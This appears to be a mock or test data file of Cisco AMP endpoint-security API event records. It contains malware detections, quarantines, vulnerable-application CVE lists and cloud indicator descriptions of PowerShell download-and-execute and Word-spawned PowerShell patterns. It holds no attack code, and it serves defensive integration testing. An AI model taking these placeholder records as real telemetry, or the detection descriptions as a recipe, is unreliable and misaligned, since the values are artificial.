-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} 